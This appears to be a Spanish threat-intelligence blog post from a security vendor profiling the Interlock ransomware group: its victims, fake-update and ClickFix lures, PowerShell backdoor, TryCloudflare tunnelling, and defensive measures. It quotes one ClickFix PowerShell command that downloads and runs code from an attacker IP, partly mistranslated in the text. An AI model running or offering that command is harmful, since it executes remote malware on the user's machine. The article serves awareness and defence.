En el panorama del ransomware de 2025, Interlock ha empezado a hacerse notar. Aunque es un grupo relativamente nuevo, ya se ha posicionado como un actor oportunista que sabe aprovechar bien los sitios web comprometidos y tácticas de ingeniería social bastante elaboradas para distribuir su malware.
Detectado por primera vez en septiembre de 2024, Interlock rompe con el esquema clásico del ransomware como servicio (RaaS). A diferencia de otros grupos, no depende de afiliados ni promueve sus operaciones públicamente. En su lugar, actúa de forma más cerrada y directa, con campañas diseñadas para sacar el máximo provecho económico. ¿Su estrategia? La ya conocida doble extorsión: cifran los datos de sus víctimas y, además, los amenazan con exponerlos si no pagan.
Para eso cuentan con su propia infraestructura y un sitio de filtraciones exclusivo llamado “Worldwide Secrets Blog”, donde publican información robada como forma de presión.
En este artículo te vamos a contar cómo suele atacar Interlock, qué lo hace diferente y, sobre todo, qué puedes hacer para proteger a tu organización de este tipo de amenazas cada vez más frecuentes.
Interlock Ransomware, también conocido en algunos círculos como Nefarious Mantis, es uno de los grupos cibercriminales más activos y preocupantes del 2025. Aunque se detectó por primera vez en septiembre de 2024, en menos de un año ha escalado rápidamente hasta convertirse en una amenaza de alto nivel, especialmente para empresas y organizaciones clave en América del Norte y Europa.
En este corto período, Interlock ha atacado sectores críticos como educación, salud, tecnología y organismos gubernamentales, aprovechando oportunidades donde las defensas cibernéticas son limitadas o poco actualizadas.
De hecho, en junio de 2025, tanto el FBI como la Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) emitieron una alerta conjunta advirtiendo sobre el incremento de su actividad. Esto dejó claro que ya no estamos ante un grupo marginal, sino frente a un jugador importante en el escenario global del ransomware.
A diferencia de otros grupos de ransomware más conocidos, Interlock no funciona bajo el modelo tradicional de Ransomware-as-a-Service (RaaS). No reclutan afiliados ni hacen publicidad de sus herramientas. Todo indica que es un grupo cerrado y altamente organizado, con una motivación 100% financiera.
Uno de los aspectos más curiosos de su forma de operar es que logran el acceso inicial a través de sitios web legítimos que han sido comprometidos, algo que no es tan común entre actores de ransomware. Esta técnica, conocida como descarga oculta (drive-by download), es más propia de campañas de malware general, pero Interlock la ha incorporado exitosamente en su arsenal.
Y no se han quedado ahí. En mayo de 2025, empezaron a usar una técnica de ingeniería social llamada ClickFix, con la que engañan a los usuarios para que descarguen software malicioso creyendo que están resolviendo un problema técnico en sus dispositivos. Así de sutiles y peligrosos.
Otro dato interesante es que la carga útil (el software que cifra los archivos) suele ejecutarse dentro de máquinas virtuales, lo que reduce el riesgo de ser detectado por antivirus tradicionales. Esto también significa que los sistemas principales (hosts físicos) a menudo no se ven afectados directamente, complicando la detección temprana del ataque.
Según informes de código abierto, hay similitudes notables entre Interlock y Rhysida, otro grupo de ransomware bien conocido. Aunque todavía no se ha confirmado oficialmente, existe la posibilidad de que Interlock sea un derivado o evolución de Rhysida.
Incluso la CISA ha publicado información sobre Rhysida que puede ser útil para entender mejor las tácticas de Interlock. Por ahora, esa conexión sigue siendo una hipótesis, pero no hay duda de que ambos comparten métodos y objetivos similares.
La actividad de Interlock ha crecido significativamente en los últimos meses. Aquí te dejamos algunos de los ataques más relevantes registrados en 2025:
El 22 de julio de 2025, el FBI y CISA emitieron una advertencia conjunta señalando que Interlock había mejorado su malware, haciéndolo más difícil de detectar. Lo más preocupante es que el grupo ahora cuenta con cifradores diseñados tanto para sistemas Windows como Linux, y ha sido visto cifrando máquinas virtuales en ambas plataformas.
Esta evolución tecnológica indica que Interlock está invirtiendo seriamente en mejorar sus herramientas y ampliar su alcance.
Uno de los incidentes más impactantes fue el ataque a DaVita, una importante red de clínicas especializadas en tratamiento renal. En este caso, Interlock logró robar 1,5 terabytes de datos sensibles, afectando a más de 200.000 pacientes.
Los datos filtrados incluían información médica confidencial, lo que provocó preocupación a nivel nacional sobre la ciberseguridad en el sector salud.
Otro caso reciente fue el ataque contra la ciudad de St. Paul, donde Interlock logró desactivar varios sistemas municipales críticos y poner en riesgo los datos personales de al menos 3.500 empleados públicos.
Lo más llamativo es que, 10 días antes del ataque, la firma de ciberinteligencia PRODAFT ya había detectado actividad sospechosa atribuida a Interlock en los sistemas de la ciudad. Incluso emitieron una advertencia pública en X (antes Twitter), indicando una "probabilidad cierta de propagación".
Hasta mediados de agosto de 2025, se sabe que al menos 58 organizaciones han sido víctimas confirmadas y sus datos han sido publicados en el sitio de filtraciones de Interlock: el llamado “Worldwide Secrets Blog”. Este portal es parte clave de su estrategia de doble extorsión: si no pagas, tus datos se hacen públicos.
Sitio de fugas de Interlock, "Worldwide Secrets Blog"
Podría interesarte leer: Principales Actores de Ransomware del Primer Semestre de 2025
Uno de los aspectos más preocupantes de Interlock Ransomware es la forma silenciosa y sofisticada en la que se infiltra en los sistemas. A diferencia de los ataques más ruidosos o evidentes, Interlock prefiere moverse en las sombras, aprovechando técnicas que imitan comportamientos legítimos y engañan directamente al usuario.
Interlock se apoya en un enfoque que combina ingeniería social con algo que en ciberseguridad se conoce como Living off the Land (LOTL). ¿Qué significa eso? Básicamente, usar herramientas y procesos legítimos del propio sistema operativo (como PowerShell o actualizaciones de software) para camuflar su actividad maliciosa y así evitar ser detectado por antivirus tradicionales o soluciones de seguridad de endpoints.
Lo peligroso de este método es que muchas veces los usuarios ni se dan cuenta de que están colaborando con el ataque. Las instrucciones maliciosas suelen estar alojadas en sitios web comprometidos que parecen legítimos, lo que genera un falso sentido de confianza. De ahí que sea tan fácil caer en la trampa.
La primera fase del ataque de Interlock empieza con falsas actualizaciones de software. Imagina que entras a una web aparentemente normal (quizá incluso de confianza) y ves un mensaje que te dice que tu navegador (Chrome o Edge, por ejemplo) necesita actualizarse.
Esa supuesta “actualización” es en realidad una versión manipulada, empaquetada con una herramienta como PyInstaller, que está diseñada para parecer un instalador legítimo. El usuario cree que está instalando una actualización de Google Chrome, pero en el fondo, lo que se ejecuta es un script malicioso que da al atacante acceso completo al equipo.
Cuando el usuario sigue las instrucciones (por ejemplo, hacer clic en "Actualizar ahora"), lo que ocurre es:
Se ejecuta un instalador real de Chrome o Edge como señuelo.
En segundo plano, se lanza un script de PowerShell malicioso sin que el usuario lo vea.
Ese script actúa como una puerta trasera (backdoor) y se comunica con los servidores de comando y control (C2) del grupo atacante.
Desde allí, el atacante puede:
Obtener información detallada del sistema.
Instalar otras herramientas maliciosas.
Preparar el terreno para el cifrado de archivos y el robo de datos.
Una técnica clave usada por Interlock se llama ClickFix. Es un método de ingeniería social bastante ingenioso, en el que los atacantes convencen al usuario para que, sin saberlo, ejecute comandos maliciosos en su propio sistema.
El truco está en hacer que el usuario crea que está “arreglando” algo. Por ejemplo, se muestra una ventana emergente que indica que hay un problema técnico (como un error de actualización) y que necesita realizar una serie de pasos para solucionarlo.
Aquí es donde entra el juego psicológico: el sitio te indica que presiones “Windows + R” (para abrir la ventana de “Ejecutar” en Windows), luego “CTRL + V” para pegar un comando previamente copiado, y finalmente que presiones “Enter”.
Lo que realmente estás haciendo en ese momento es ejecutar un comando malicioso de PowerShell, que compromete completamente tu dispositivo.
El cuadro de diálogo del actualizador falso de ClickFix solicita a los usuarios que ejecuten manualmente el comando de PowerShell.
Además de ClickFix, se ha observado una variante llamada FileFix, que sigue la misma lógica de aprovechar la confianza del usuario, pero con ligeras diferencias en la forma de entrega. Ambos métodos comparten un objetivo: hacer que el usuario ejecute código malicioso por su cuenta, disfrazado como una solución legítima a un problema inexistente.
ClickFix no es exclusivo de Interlock. Se ha utilizado también en campañas que distribuyen:
Lumma Stealer (LummaC2)
AsyncRAT
DanaBot
DarkGate
Esto demuestra que la técnica es popular entre grupos cibercriminales por una razón muy simple: funciona. Y mientras siga siendo efectiva, veremos más variantes adaptadas a diferentes campañas y objetivos.
Una vez que el usuario ejecuta por error el comando malicioso (generalmente engañado por alguna técnica como ClickFix), se pone en marcha una puerta trasera en PowerShell que trabaja de forma muy discreta. No hay ventanas abiertas, ni alertas visibles. Esta puerta trasera simplemente se ejecuta en segundo plano, reiniciándose por separado para no levantar sospechas y esquivar herramientas de monitoreo tradicionales.
Básicamente, comienza a comunicarse con servidores remotos controlados por los atacantes (conocidos como servidores C2) mediante solicitudes HTTP. Y por si uno de estos servidores deja de funcionar, tienen una lista de respaldo con varios dominios y direcciones IP para mantener la conexión activa.
Uno de los motivos por los que esta técnica sigue funcionando tan bien es la ofuscación del código. En pocas palabras: los atacantes esconden sus comandos reales bajo capas de código enredado que parece inofensivo o incomprensible a simple vista.
En campañas recientes, sobre todo las que usan ingeniería social tipo ClickFix, se ha detectado una gran variedad en los comandos de PowerShell utilizados. Todos están diseñados para evadir sistemas de seguridad que buscan patrones o palabras clave específicas.
Reemplazan letras por códigos de caracteres.
Usan símbolos como + (plus), * (asterisco) y ? (intercalación) para mezclar el código.
Encapsulan comandos maliciosos dentro de funciones legítimas como:
Invoke-RestMethod
Invoke-Expression
Alias de estas funciones
Estos comandos maliciosos suelen venir acompañados de URLs ocultas, algunas alojadas en dominios peligrosos y otras en servicios legítimos que han sido reutilizados con fines maliciosos, como trycloudflare.com, o incluso direcciones IPv4 directas que no levantan sospechas a primera vista.
Una vez activa, esta herramienta maliciosa empieza a recolectar datos importantes del sistema afectado, incluyendo:
Información sobre el sistema operativo
Privilegios del usuario
Procesos y servicios activos
Configuraciones de red
Antes de enviar esa información al servidor de los atacantes, el script la ofusca y comprime, para que no sea detectada fácilmente por herramientas de seguridad.
Una vez que los ciberdelincuentes tienen esa información, el servidor C2 puede enviar nuevas instrucciones, como:
Descargar e instalar archivos ejecutables o DLLs maliciosos
Ejecutar comandos personalizados
Expandir el control dentro de la red comprometida
Conoce más sobre: Alianza Letal de Hackers: ShinyHunters y Scattered Spider Atacan
Para mantener el control y moverse dentro de los sistemas infectados, Interlock suele usar herramientas avanzadas y conocidas en el mundo del cibercrimen, como:
Cobalt Strike – Una suite de herramientas para pruebas de penetración que suele ser reutilizada por atacantes.
Interlock RAT – Probablemente desarrollado por ellos mismos.
NodeSnake RAT – Una herramienta remota escrita en Node.js.
SystemBC – Una plataforma para ocultar tráfico malicioso mediante proxy.
Estas herramientas no solo facilitan la comunicación encubierta, sino que permiten a los atacantes moverse lateralmente por la red y lanzar más ataques desde dentro.
PowerShell.exe -w h -c "iex $(irm 138[.]199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z – $y). TotalSegundos; $w = [matemáticas]::Piso($x); $v = $w – ($w %% 16); [int64]$v))"
Ejemplo de un script de PowerShell malicioso, que se engaña a las víctimas para que ejecuten
A medida que Interlock ha evolucionado, también lo ha hecho su capacidad de mantenerse dentro de los sistemas una vez comprometidos. En las versiones más recientes del script malicioso (hasta la versión 11), se ha observado que establecen persistencia a través del Registro de Windows.
Esto significa que, incluso si el sistema se reinicia o el usuario intenta limpiar el equipo, el script malicioso puede volver a ejecutarse automáticamente y mantener la conexión con los servidores de comando y control.
Uno de los trucos más inteligentes (y preocupantes) de Interlock es cómo aprovechan herramientas legítimas para actividades maliciosas. En particular, abusan de TryCloudflare, una herramienta de Cloudflare Tunnel diseñada para facilitar la creación de túneles temporales sin necesidad de configurar un dominio en Cloudflare.
Los atacantes usan subdominios generados dinámicamente a través de TryCloudflare para ocultar sus comunicaciones y evitar ser bloqueados fácilmente. Al ser direcciones que parecen legítimas y cambian constantemente, es muy difícil rastrear su origen o detener su actividad a tiempo.
Estos dominios temporales actúan como proxies que canalizan el tráfico malicioso, mezclándolo con tráfico aparentemente normal para pasar desapercibido ante los filtros de seguridad.
Una de las razones por las que Interlock Ransomware está dando tanto de qué hablar es por lo bien que logra pasar desapercibido. No solo ataca de forma sigilosa, sino que ha ido perfeccionando sus herramientas para evitar ser detectado por las soluciones de seguridad tradicionales.
Recientemente, se ha confirmado que Interlock ha añadido a su arsenal un troyano de acceso remoto (RAT) personalizado, diseñado en PowerShell. Esta herramienta no es una cualquiera: fue creada a medida para integrarse en la primera fase del ataque y facilitar el control remoto del sistema infectado.
¿Y cómo lo entregan? A través de su ya conocida táctica: falsas actualizaciones de software que aparecen en sitios web comprometidos. El usuario cree que está instalando algo legítimo, pero en realidad está abriendo la puerta a esta RAT encubierta.
Una vez dentro del sistema, el RAT de PowerShell se ejecuta en segundo plano, sin mostrar ninguna ventana o señal evidente para el usuario. Eso significa que puede operar por días (o incluso semanas) sin levantar sospechas.
Este RAT tiene dos funciones principales:
Recopilar información detallada del sistema (como configuraciones, procesos activos, red, privilegios de usuario, etc.).
Permitir que los atacantes ejecuten comandos de forma remota y descarguen otras cargas maliciosas para avanzar con el ataque (como cifrar archivos o moverse lateralmente por la red).
Todo esto ocurre de forma persistente, es decir, se mantiene activo incluso después de reiniciar el equipo, lo que hace que eliminarlo no sea tan sencillo.
Cuando aparece una amenaza como Interlock Ransomware, no hay tiempo que perder. En TecnetOne, nuestro SOC (Centro de Operaciones de Seguridad) está preparado para actuar en cuanto detectamos actividad sospechosa o campañas activas.
En lugar de reaccionar tarde, trabajamos de forma anticipada. ¿Cómo? Monitorizamos de forma constante el panorama de amenazas y, cuando identificamos algo nuevo (como tácticas, técnicas o indicadores de compromiso usados por grupos como Interlock), ajustamos nuestras reglas de detección al instante.
Gracias a nuestra experiencia y al uso de inteligencia de amenazas actualizada, nuestro equipo:
Detecta ataques en fases tempranas (antes de que se conviertan en una crisis).
Refuerza la seguridad de cada cliente de forma personalizada.
Implementa nuevas defensas en tiempo real.
Y esto no es algo puntual. A medida que aparecen nuevas variantes o comportamientos, mejoramos continuamente nuestras detecciones para cubrir cualquier ángulo que los atacantes puedan aprovechar.
En resumen: mientras otros se enteran del ataque cuando ya es tarde, nosotros ya lo estamos bloqueando.
Interlock no es nuevo, pero su actividad durante 2025 lo ha convertido en una amenaza que no se puede ignorar. Solo este año, ya provocó advertencias oficiales del FBI y CISA, y su ataque a la ciudad de Saint Paul dejó claro que el grupo está subiendo la apuesta: va tras blancos más grandes, con la expectativa de obtener rescates más altos, sin importar si comprometen infraestructura crítica.
Este grupo no solo cifra archivos. Usa malware como Interlock RAT, se infiltra a través de sitios web comprometidos, y se adapta constantemente. Lo que buscan es claro: impacto, presión y ganancias rápidas.
No existe una solución única que detenga completamente a Interlock, pero sí hay muchas medidas efectivas que puedes implementar hoy mismo. Aquí van las más importantes:
Evita el acceso inicial: Usa firewalls que filtren tráfico DNS y web, y capacita a tu equipo para detectar intentos de phishing y actualizaciones falsas.
Bloquea túneles maliciosos: Si no usas servicios como TryCloudflare para fines operativos, bloquea sus dominios en tu red.
Aplica parches de seguridad: Mantén tu sistema operativo, software y firmware siempre actualizados. Las vulnerabilidades antiguas siguen siendo el blanco favorito de los atacantes.
Segmenta tu red: Divide tu infraestructura para limitar el daño si un dispositivo se ve comprometido.
Gestiona identidades y accesos: Aplica políticas sólidas de administración de usuarios, credenciales y permisos en toda tu organización.
Ten listo un plan de respuesta a incidentes: Asegúrate de contar con un equipo o proveedor especializado que pueda actuar rápido si algo pasa.
Implementa una solución EDR: Herramientas como TecnetProtect no solo detectan señales invisibles de ataques, sino que pueden frenar a los atacantes antes de que tomen control.
Activa la autenticación multifactor (MFA)
Especialmente para el correo corporativo, VPNs y cualquier sistema crítico.